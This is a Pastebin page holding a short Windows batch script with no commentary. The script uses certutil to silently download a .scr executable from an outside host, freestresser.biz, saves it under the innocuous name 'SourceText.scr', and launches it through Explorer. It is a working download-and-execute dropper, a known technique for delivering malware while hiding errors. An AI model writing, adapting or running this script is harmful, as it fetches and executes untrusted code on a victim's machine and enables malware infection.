Advertisement
Guest User

Untitled

a guest
Oct 20th, 2019
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. @echo off
  2. Set "URL=https://freestresser.biz/path/main.scr"
  3. Set "File=SourceText.scr"
  4. Call :Download "%Url%" "%File%"
  5. If exist "%File%" Explorer "%File%"
  6. Exit
  7. :Download <Url> <File>
  8. certutil.exe -urlcache -split -f %1 %2>nul
  9. exit /b
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement